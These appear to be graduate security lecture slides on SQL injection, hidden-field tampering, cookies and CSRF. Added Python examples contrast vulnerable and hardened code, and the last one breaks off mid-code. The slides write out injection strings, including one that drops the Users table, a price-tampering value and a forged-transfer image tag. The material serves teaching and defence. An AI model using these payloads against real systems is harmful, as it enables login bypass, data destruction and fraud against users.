CLASSIC WEB ATKS & DEFS - cs.umd.edu
GRAD SEC, SEP 19 2017
TODAY’S PAPERS
A very basic web architecture

Client: Browser
Server: Web server, which talks to a Database that holds the (Private) Data

DB is a separate entity, logically (and often physically)
SQL security
Databases
• Provide data storage & data manipulation
• Database designer lays out the data into tables
• Programmers query the database
• Database Management Systems (DBMSes) provide
  • semantics for how to organize data
  • transactions for manipulating data sanely
  • a language for creating & querying data - and APIs to interoperate with other languages
  • management via users & permissions
Databases: basics

Users

| Name    | Gender | Age | Email             | Password |
|---------|--------|-----|-------------------|----------|
| Dee     | F      | 28  | [email protected] | j3i8g8ha |
| Mac     | M      | 7   | [email protected] | a0u23bt  |
| Charlie | M      | 32  | [email protected] | 0aergja  |
| Dennis  | M      | 28  | [email protected] | 1bjb9a93 |
| Frank   | M      | 57  | [email protected] | ziog9gga |

Terminology: the whole grid is a Table; “Users” is the Table name; Name, Gender, Age, Email and Password are Columns; each line (e.g. Dee’s) is a Row (Record).
Database transactions
Transactions are the unit of work on a database

“Deduct $100 from Alice; Add $100 to Bob” (2 writes, 1 transaction)
“Give me everyone in the User table who is listed as taking CMSC414 in the Classes table” (2 reads, 1 transaction)

• Typically want ACID transactions
  • Atomicity: Transactions complete entirely or not at all
  • Consistency: The database is always in a valid state (but not necessarily correct)
  • Isolation: Results from a transaction aren’t visible until it is complete
  • Durability: Once a transaction is committed, it remains, despite, e.g., power failures
SQL (Standard Query Language)

Against the Users table above:

SELECT Age FROM Users WHERE Name='Dee';                    -- returns 28
UPDATE Users SET email='[email protected]' WHERE Age=32;    -- this is a comment
INSERT INTO Users Values('Frank', 'M', 57, ...);
DROP TABLE Users;
Server-side code

“Login code” (php) on the website:

$result = mysql_query("select * from Users where(name='$user' and password='$pass');");

Suppose you successfully log in as $user if this query returns any rows whatsoever

How could you exploit this?
SQL injection

$result = mysql_query("select * from Users where(name='$user' and password='$pass');");

Supplying the user name  frank' OR 1=1); --  turns the query into:

$result = mysql_query("select * from Users where(name='frank' OR 1=1); -- ' and password='whocares');");

Can chain together statements with semicolon: STATEMENT 1 ; STATEMENT 2

Supplying  frank' OR 1=1); DROP TABLE Users; --  turns it into:

$result = mysql_query("select * from Users where(name='frank' OR 1=1); DROP TABLE Users; -- ' and password='whocares');");
SQL injection
Buffer “errors”
XSS
CSRF
SQL injection countermeasures
• Blacklisting: Delete the characters you don’t want
  • '
  • --
  • ;
• Downside: “Peter O’Connor”
  • You want these characters sometimes!
  • How do you know if/when the characters are bad?
SQL injection countermeasures
1. Whitelisting
• Check that the user-provided input is in some set of values known to be safe
  • Integer within the right range
• Given an invalid input, better to reject than to fix
  • “Fixes” may introduce vulnerabilities
  • Principle of fail-safe defaults
• Downside:
  • Um.. Names come from a well-known dictionary?
SQL injection countermeasures
2. Escape characters
• Escape characters that could alter control
  • ' ⇒ \'
  • ; ⇒ \;
  • - ⇒ \-
  • \ ⇒ \\
• Hard by hand, but there are many libs & methods
  • magic_quotes_gpc = On
  • mysql_real_escape_string()
• Downside: Sometimes you want these in your SQL!
The underlying issue
• This one string combines the code and the data
• Similar to buffer overflows:

$result = mysql_query("select * from Users where(name='$user' and password='$pass');");

When the boundary between code and data blurs, we open ourselves up to vulnerabilities
The underlying issue

$result = mysql_query("select * from Users where(name='$user' and password='$pass');");

The query as the database parses it (the slide draws this as a tree):

select / from / where
   *      Users      and
                    /   \
                   =     =
                  / \   / \
              name $user password $pass

$user and $pass are spliced into the string before it is parsed, so their contents land in these leaves only if they contain no SQL syntax; otherwise they reshape the tree itself.
SQL injection countermeasures
3. Prepared statements & bind variables
Key idea: Decouple the code and the data

Instead of

$result = mysql_query("select * from Users where(name='$user' and password='$pass');");

write

$db = new mysqli("localhost", "user", "pass", "DB");
$statement = $db->prepare("select * from Users where(name=? and password=?);");
$statement->bind_param("ss", $user, $pass);
$statement->execute();

• Bind variables: the ? placeholders stand in for the data
• Bind variables are typed ("ss" declares both as strings)
• Decoupling lets us compile now, before binding the data
The underlying issue

$statement = $db->prepare("select * from Users where(name=? and password=?);");

select / from / where
   *      Users      and
                    /   \
                   =     =
                  / \   / \
              name  ?  password ?
                    ↑           ↑
                  $user       $pass

Binding only fills in the leaves (?), so the structure of the tree is fixed
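As an added example (not from the slides), the login query above transliterated into Python's sqlite3, whose parameter binding plays the role of mysqli's prepare/bind_param: it runs the slides' two payloads and the “Peter O’Connor” case against the spliced query, the blacklisting filter and the bound query, over a Users table rebuilt from the slides (e-mail addresses constructed, since the slides redact them).

```python
import sqlite3

# Constructed sample data mirroring the Users table on the slides; the
# e-mail addresses are placeholders because the slides redact them.
USERS = [
    ("Dee", "F", 28, "dee@example.invalid", "j3i8g8ha"),
    ("Mac", "M", 7, "mac@example.invalid", "a0u23bt"),
    ("Charlie", "M", 32, "charlie@example.invalid", "0aergja"),
    ("Dennis", "M", 28, "dennis@example.invalid", "1bjb9a93"),
    ("Frank", "M", 57, "frank@example.invalid", "ziog9gga"),
]


def fresh_db():
    """In-memory SQLite database holding the slides' Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users(Name TEXT, Gender TEXT, Age INTEGER, "
                 "Email TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?, ?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, user, pw):
    """The slides' PHP login transliterated: code and data spliced into one
    string, so the data can rewrite the query's parse tree."""
    query = f"select * from Users where(name='{user}' and password='{pw}');"
    return conn.execute(query).fetchall()


def login_prepared(conn, user, pw):
    """Countermeasure 3: the query is parsed with '?' leaves first and the
    data is bound afterwards, so the tree's structure cannot change."""
    stmt = "select * from Users where(name=? and password=?)"
    return conn.execute(stmt, (user, pw)).fetchall()


def blacklist(value):
    """The slides' blacklisting countermeasure: delete ', -- and ;."""
    return value.replace("--", "").replace("'", "").replace(";", "")


def demo():
    """Runs the slides' inputs against each variant; returns row counts."""
    payload = "frank' OR 1=1); --"
    chained = "frank' OR 1=1); DROP TABLE Users; --"
    conn = fresh_db()
    out = {}
    # Honest credentials: one row from either variant.
    out["vuln_good"] = len(login_vulnerable(conn, "Frank", "ziog9gga"))
    out["prep_good"] = len(login_prepared(conn, "Frank", "ziog9gga"))
    # Slide 38's payload: the spliced query becomes
    #   ... where(name='frank' OR 1=1); -- ' and password='whocares');
    # so every row comes back and the "any rows => logged in" rule fires.
    out["vuln_inject"] = len(login_vulnerable(conn, payload, "whocares"))
    # Bound as data, the same string is just an unknown user name: no rows.
    out["prep_inject"] = len(login_prepared(conn, payload, "whocares"))
    # Slide 40's chained payload. sqlite3's execute() accepts exactly one
    # statement, so the driver refuses the tail; that is a property of this
    # driver (PHP's mysql_query behaves the same), not a fix for the splice.
    try:
        login_vulnerable(conn, chained, "whocares")
        out["vuln_chained"] = "executed"
    except (sqlite3.Warning, sqlite3.Error):
        out["vuln_chained"] = "refused by driver"
    out["table_survives"] = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE name='Users'").fetchone()[0]
    # Blacklisting's downside from slide 46: a legitimate apostrophe is
    # deleted, so "Peter O'Connor" can never match his own record, while
    # binding passes the name through untouched.
    conn.execute("INSERT INTO Users VALUES (?, ?, ?, ?, ?)",
                 ("Peter O'Connor", "M", 40, "peter@example.invalid", "pw1"))
    out["blacklist_oconnor"] = len(
        login_vulnerable(conn, blacklist("Peter O'Connor"), blacklist("pw1")))
    out["prep_oconnor"] = len(login_prepared(conn, "Peter O'Connor", "pw1"))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```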
Mitigating the impact
• Limit privileges
  • Can limit commands and/or tables a user can access
    - Allow SELECT queries on Orders_Table but not on Creditcards_Table
  • Follow the principle of least privilege
  • Incomplete fix, but helpful
• Encrypt sensitive data stored in the database
  • May not need to encrypt Orders_Table
  • But certainly encrypt Creditcards_Table.cc_numbers
Web security
A very basic web architecture

[Diagram: Browser (Client) ↔ Web server (Server) ↔ Database ((Private) Data)]

DB is a separate entity, logically (and often physically)
(Much) user data is part of the browser
Interacting with web servers

http://www.cs.umd.edu/~dml/home.html

Get and put resources which are identified by a URL
• Protocol: http here (alternatives include ftp, https, tor)
• Hostname/server: translated to an IP address by DNS (more on this later)
• Path to a resource: here, the file home.html is static content, i.e., a fixed file returned by the server

http://facebook.com/delete.php?f=joe123&w=16
• Path to a resource: here, the file (delete.php) is dynamic content, i.e., the server generates the content on the fly
• Arguments: ?f=joe123&w=16
Basic structure of web traffic

[Diagram: Browser (Client) ↔ HTTP ↔ Web server (Server) ↔ Database ((Private) Data)]

• HyperText Transfer Protocol (HTTP)
• An "application-layer" protocol for exchanging collections of data

User clicks → HTTP Request

• Requests contain:
  • The URL of the resource the client wishes to obtain
  • Headers describing what the browser can do
• Requests can be GET or POST
  • GET: all data is in the URL itself (supposed to have no side-effects)
  • POST: includes the data as separate fields (can have side-effects)
HTTP GET requests

[Screenshot: a GET request for http://www.reddit.com/r/security]
User-Agent is typically a browser but it can be wget, JDK, etc.
Referrer URL: the site from which this request was issued.

HTTP POST requests

[Screenshot: posting on Piazza]
Implicitly includes data as a part of the URL
Explicitly includes data as a part of the request's content
Basic structure of web traffic

[Diagram: Browser (Client) sends an HTTP Request to the Web server (Server) when the user clicks; the server answers with an HTTP Response]

• Responses contain:
  • Status code
  • Headers describing what the server provides
  • Data
  • Cookies
    • State it would like the browser to store on the site's behalf
HTTP responses

[Screenshot of a raw HTTP response, annotated: HTTP version, status code and reason phrase on the first line; headers; data (<html> …… </html>)]
HTTP is stateless

• The lifetime of an HTTP session is typically:
  • Client connects to the server
  • Client issues a request
  • Server responds
  • Client issues a request for something in the response
  • …. repeat ….
  • Client disconnects
• HTTP has no means of noting "oh this is the same client from that previous session"
• With this alone, you'd have to log in at every page load
Maintaining state across HTTP sessions

• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent requests

[Diagram: the Web server sends State to the Browser in an HTTP Response; the Browser sends the State back in its next HTTP Request; the cycle repeats]
Online ordering

[Two pages on socks.com: an Order page ("$5.50", Order button) and a separate Pay page ("The total cost is $5.50. Confirm order?", Yes / No)]
Online ordering: what's presented to the user

<html><head> <title>Pay</title> </head><body>
<form action="submit_order" method="GET">
The total cost is $5.50. Confirm order?
<input type="hidden" name="price" value="5.50">
<input type="submit" name="pay" value="yes">
<input type="submit" name="pay" value="no">
</form>
</body></html>

The corresponding backend processing

if(pay == yes && price != NULL){
    bill_creditcard(price);
    deliver_socks();
}else
    display_transaction_cancelled_page();

The hidden field lives in the client's copy of the page; nothing stops the client from submitting it as value="0.01"
Minimizing trust in the client: what's presented to the user

<html><head> <title>Pay</title> </head><body>
<form action="submit_order" method="GET">
The total cost is $5.50. Confirm order?
<input type="hidden" name="sid" value="781234">
<input type="submit" name="pay" value="yes">
<input type="submit" name="pay" value="no">
</form>
</body></html>

The corresponding backend processing

price = lookup(sid);
if(pay == yes && price != NULL){
    bill_creditcard(price);
    deliver_socks();
}else
    display_transaction_cancelled_page();

We don't want to pass hidden fields around all the time
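Added example (not from the slides) of the two submit_order backends above, written in Python: the first trusts the hidden price field the client sends back, the second only accepts a session id and takes the price from the server's own record. The query strings, the ORDERS table and the lookup() stand-in are constructed for the demo; bill_creditcard() and deliver_socks() are represented by the returned amount.

```python
"""Added example (not from the slides): the socks.com submit_order handler
written two ways.  Query strings, the ORDERS table and lookup() are
constructed stand-ins; the amount returned stands for bill_creditcard()."""
from urllib.parse import parse_qs

# Server-side order state, indexed by session id (constructed sample).
ORDERS = {"781234": {"item": "socks", "price": "5.50"}}


def lookup(sid):
    """Return the price the server recorded for sid, or None if unknown."""
    order = ORDERS.get(sid)
    return order["price"] if order else None


def _first(params, name):
    """parse_qs maps each name to a list; take the first value or None."""
    return params.get(name, [None])[0]


def submit_order_trusting_client(query):
    """Vulnerable: the price is whatever hidden field the client sent back.
    Returns the amount billed, or None when the transaction is cancelled."""
    params = parse_qs(query)
    pay, price = _first(params, "pay"), _first(params, "price")
    if pay == "yes" and price is not None:
        return price            # bill_creditcard(price); deliver_socks();
    return None                 # display_transaction_cancelled_page();


def submit_order_server_state(query):
    """Hardened: only an opaque session id round-trips through the client;
    the price comes from the server's record, so editing the form (or
    adding a price parameter) changes nothing.  Unknown ids cancel."""
    params = parse_qs(query)
    pay, sid = _first(params, "pay"), _first(params, "sid")
    price = lookup(sid) if sid is not None else None
    if pay == "yes" and price is not None:
        return price
    return None


if __name__ == "__main__":
    print(submit_order_trusting_client("price=0.01&pay=yes"))   # 0.01 billed
    print(submit_order_server_state("sid=781234&price=0.01&pay=yes"))  # 5.50
```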
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Request
![Page 126: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/126.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Request
State
![Page 127: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/127.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
[Figure (animated build): Browser (Client) and Web server (Server). The HTTP Request arrives; the server creates State indexed by a Cookie; the HTTP Response carries the Cookie to the browser, which stores it; the browser's next HTTP Request to that server carries the Cookie back, and the server uses it to look up the State.]
![Page 136: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/136.jpg)
Cookies are key-value pairs
Set-Cookie: key=value; options; ….
[Figure: an HTTP response split into Headers (where the Set-Cookie line appears) and Data (<html> …… </html>)]
![Page 138: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/138.jpg)
Cookies
[Figure (animated build): the browser (Client) holds the cookie as (Private) Data; each field of the Set-Cookie line is annotated with its meaning]
Semantics
• Store “us” under the key “edition” (think of it like one big hash table)
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
• This should be available to any resource within a subdirectory of /
• Send the cookie to any future requests to <domain>/<path>
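The cookie semantics listed above, worked as an added example that is not part of the lecture: a small Python cookie jar that parses one Set-Cookie header and applies the Expires, Domain and Path rules to decide which stored cookies a later request would carry. The header value, hostnames and dates are constructed; domain and path matching follow the RFC 6265 rules, which is slightly more general than the slide's bullets (a missing Domain attribute scopes the cookie to the responding host only).

```python
# Added example (not from the slides): a minimal cookie jar implementing the
# Set-Cookie semantics described above. Sample values are constructed.
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import List, Optional
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    value: str
    domain: str                  # scope host, without any leading dot
    host_only: bool              # True when Set-Cookie had no Domain attribute
    path: str
    expires: Optional[datetime]  # None = session cookie, discarded on exit


def default_path(request_path: str) -> str:
    """RFC 6265 default-path: the request path up to, not including, its last '/'."""
    if not request_path.startswith("/") or request_path.count("/") == 1:
        return "/"
    return request_path.rsplit("/", 1)[0]


def parse_set_cookie(header: str, request_host: str, request_path: str) -> Cookie:
    """Turn one Set-Cookie header value into a Cookie record.

    Attributes the header omits get the browser defaults: Domain -> the
    responding host only, Path -> the request's directory, Expires -> session.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name.strip(), value.strip(), request_host.lower(), True,
                    default_path(request_path), None)
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain" and val:
            # ".zdnet.com" and "zdnet.com" mean the same: zdnet.com and its subdomains
            cookie.domain = val.lstrip(".").lower()
            cookie.host_only = False
        elif key == "path" and val.startswith("/"):
            cookie.path = val
        elif key == "expires" and val:
            cookie.expires = parsedate_to_datetime(val)
    return cookie


def domain_matches(host: str, cookie: Cookie) -> bool:
    """'Readable by any domain ending in .zdnet.com': the host itself or a subdomain of it."""
    host = host.lower()
    if cookie.host_only:
        return host == cookie.domain
    return host == cookie.domain or host.endswith("." + cookie.domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """RFC 6265 path-match: equal, or the cookie path is a prefix that ends at a '/'."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


def cookies_for_request(jar: List[Cookie], url: str, now: datetime) -> List[str]:
    """The name=value pairs a browser would put in the Cookie header of this request."""
    parts = urlsplit(url)
    host, path = parts.hostname or "", parts.path or "/"
    return [f"{c.name}={c.value}" for c in jar
            if (c.expires is None or now < c.expires)
            and domain_matches(host, c)
            and path_matches(path, c.path)]


# Constructed sample: a response from www.zdnet.com sets the "edition" cookie from
# the slide, readable by *.zdnet.com under path / until Wed Feb 18.
SAMPLE_SET_COOKIE = ("edition=us; expires=Wed, 18 Feb 2015 08:00:00 GMT; "
                     "domain=.zdnet.com; path=/")
JAR = [parse_set_cookie(SAMPLE_SET_COOKIE, "www.zdnet.com", "/article/index.html")]
BEFORE_EXPIRY = datetime(2015, 2, 10, tzinfo=timezone.utc)
AFTER_EXPIRY = datetime(2015, 2, 19, tzinfo=timezone.utc)

if __name__ == "__main__":
    for url in ("http://www.zdnet.com/news/", "http://zdnet.com/",
                "http://zdnet.com.example.net/", "http://notzdnet.com/"):
        print(url, "->", cookies_for_request(JAR, url, BEFORE_EXPIRY))
    print("after expiry ->", cookies_for_request(JAR, "http://www.zdnet.com/", AFTER_EXPIRY))
```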
![Page 145: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/145.jpg)
Requests with cookies
Subsequent visit
…
[Figure (animated build): the browser's subsequent request carries the stored cookie in its headers, and the server's Response follows]
![Page 148: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/148.jpg)
Why use cookies?
• Personalization
  • Let an anonymous user customize your site
  • Store font choice, etc., in the cookie
![Page 149: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/149.jpg)
Why use cookies?
• Tracking users
  • Advertisers want to know your behavior
  • Ideally build a profile across different websites
    - Read about iPad on CNN, then see ads on Amazon?!
  • How can an advertiser (A) know what you did on another site (S)?
    S shows you an ad from A; A scrapes the referrer URL
    Option 1: A maintains a DB, indexed by your IP address. Problem: IP addrs change
    Option 2: A maintains a DB indexed by a cookie
    - “Third-party cookie”
    - Commonly used by large ad networks (doubleclick)
![Page 153: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/153.jpg)
![Page 154: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/154.jpg)
Ad provided by an ad network
![Page 163: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/163.jpg)
I visit reddit.com
Later, I go to reddit.com/r/security
We are only sharing this cookie with *.adzerk.net; but we are telling them about where we just came from
![Page 164: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/164.jpg)
Cookies and web authentication
• An extremely common use of cookies is to track users who have already authenticated
• If the user already visited http://website.com/login.html?user=alice&pass=secret with the correct password, then the server associates a “session cookie” with the logged-in user’s info
• Subsequent requests (GET and POST) include the cookie in the request headers and/or as one of the fields: http://website.com/doStuff.html?sid=81asf98as8eak
• The idea is for the server to be able to say “I am talking to the same browser that authenticated Alice earlier.”
Attacks?
![Page 166: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/166.jpg)
Cross-Site Request Forgery (CSRF)
![Page 167: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/167.jpg)
URLs with side-effects
• GET requests should have no side-effects, but often do
• What happens if the user is logged in with an active session cookie and visits this link?
• How could you possibly get a user to visit this link?
http://bank.com/transfer.cgi?amt=9999&to=attacker
![Page 168: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/168.jpg)
Exploiting URLs with side-effects
[Figure (animated build): the browser (Client) loads a page from attacker.com that contains
<img src="http://bank.com/transfer.cgi?amt=9999&to=attacker">
The browser automatically visits the URL to obtain what it believes will be an image: it sends the request http://bank.com/transfer.cgi?amt=9999&to=attacker to bank.com, attaching the user's bank.com Cookie, and bank.com carries out the transfer ($$$).]
![Page 176: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/176.jpg)
Login CSRF
![Page 178: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/178.jpg)
Cross-Site Request Forgery
• Target: User who has some sort of account on a vulnerable server where requests from the user’s browser to the server have a predictable structure
• Attack goal: make requests to the server via the user’s browser that look to the server like the user intended to make them
• Attacker tools: ability to get the user to visit a web page under the attacker’s control
• Key tricks:
  • Requests to the web server have predictable structure
  • Use of something like <img src=…> to force the victim to send it
![Page 179: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/179.jpg)
CSRF protections
• Client-side: Disallow one site to link to another?? The loss of functionality would be too high
• Let’s consider server-side protections
![Page 182: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/182.jpg)
Secret validation tokens
• Include a secret validation token in the request
• Must be difficult for an attacker to predict
• Options:
  • Random session ID
    - Stored as cookie (“session independent nonce”)
    - Stored at server (“session-dependent nonce”)
  • The session cookie itself (“session identifier”): http://website.com/doStuff.html?sid=81asf98as8eak
  • HMAC of the cookie
    - As unique as session cookie, but learning the HMAC doesn’t reveal the cookie itself
![Page 183: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/183.jpg)
Referrer URLs
Idea: Only allow certain actions if the referrer URL is from this site, as well
Problem: Often suppressed
![Page 186: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/186.jpg)
Custom headers
Security through obscurity
Include precisely what is needed to identify the principal who referred
Origin headers: More private Referrer headers
http://foo.com/embarrassing.html?data=oops
Send only for POST requests
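An added example, not from the lecture, that ties together the “HMAC of the cookie” validation token from the Secret validation tokens slide and the Referrer/Origin checks from the slides just above: a server-side gate for a state-changing request such as transfer.cgi. SERVER_KEY, SITE_ORIGIN, the request dicts and the stand-in attacker.com URLs are constructed; the session id reuses the sid value shown on the slides.

```python
# Added example (not from the slides): layered server-side CSRF checks.
# Token = HMAC(server key, session cookie); Origin/Referer checked when present.
import hashlib
import hmac
from typing import Dict, Optional
from urllib.parse import urlsplit

SERVER_KEY = b"constructed-server-secret-rotate-me"   # server-side only, never sent out
SITE_ORIGIN = "https://bank.com"                      # the one origin allowed to POST here
ALICE_SID = "81asf98as8eak"                           # the session id shown on the slides


def csrf_token(session_cookie: str) -> str:
    """Validation token = HMAC-SHA256 of the session cookie under the server key.

    As unique as the session cookie, but a token that leaks (in a URL, a log,
    a Referer) does not reveal the cookie itself.
    """
    return hmac.new(SERVER_KEY, session_cookie.encode(), hashlib.sha256).hexdigest()


def token_valid(session_cookie: Optional[str], token: Optional[str]) -> bool:
    if not session_cookie or not token:
        return False
    # constant-time comparison: an early-exit string compare would leak the token
    return hmac.compare_digest(csrf_token(session_cookie), token)


def origin_allowed(headers: Dict[str, str]) -> bool:
    """Origin (or, failing that, the Referer's origin) must be this site if present.

    Browsers send Origin on POST and it carries only scheme://host, not the
    path and query a Referer would leak. Referer is often suppressed, so a
    request with neither header is passed on to the token check instead.
    """
    origin = headers.get("Origin")
    if origin is None and "Referer" in headers:
        r = urlsplit(headers["Referer"])
        origin = f"{r.scheme}://{r.netloc}"
    if origin is None:
        return True
    return origin == SITE_ORIGIN


def authorize_state_change(request: Dict) -> str:
    """Gate a state-changing request; returns 'ok' or the reason for rejection.

    `request` is a constructed stand-in for a framework request object:
    {"method", "headers", "cookies", "params"}.
    """
    if request["method"] != "POST":
        return "reject: state changes only via POST (GET must have no side-effects)"
    if not origin_allowed(request["headers"]):
        return "reject: cross-site Origin/Referer"
    sid = request["cookies"].get("sid")
    if not sid:
        return "reject: no session"
    if not token_valid(sid, request["params"].get("csrf_token")):
        return "reject: missing or wrong validation token"
    return "ok"


# Constructed sample requests. All carry Alice's session cookie, because the
# browser attaches it to every bank.com request no matter which page triggered it.
def alice_transfer() -> Dict:
    """Alice submits the bank's own form; the page embedded the token it was served."""
    return {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
            "cookies": {"sid": ALICE_SID},
            "params": {"amt": "10", "to": "bob", "csrf_token": csrf_token(ALICE_SID)}}


def img_triggered_get() -> Dict:
    """The <img src=...> case from the slides: a GET carrying the cookie but no token."""
    return {"method": "GET", "headers": {"Referer": "http://attacker.com/page.html"},
            "cookies": {"sid": ALICE_SID}, "params": {"amt": "9999", "to": "attacker"}}


def cross_site_post() -> Dict:
    """A POST issued from attacker.com: Origin names that site; the token can only be guessed."""
    return {"method": "POST", "headers": {"Origin": "http://attacker.com"},
            "cookies": {"sid": ALICE_SID},
            "params": {"amt": "9999", "to": "attacker", "csrf_token": "guess"}}


def suppressed_referrer_post(token: str) -> Dict:
    """Neither Origin nor Referer reached the server: the token alone decides."""
    return {"method": "POST", "headers": {}, "cookies": {"sid": ALICE_SID},
            "params": {"amt": "10", "to": "bob", "csrf_token": token}}


if __name__ == "__main__":
    cases = (("alice_transfer", alice_transfer()),
             ("img_triggered_get", img_triggered_get()),
             ("cross_site_post", cross_site_post()),
             ("no referrer, own token", suppressed_referrer_post(csrf_token(ALICE_SID))),
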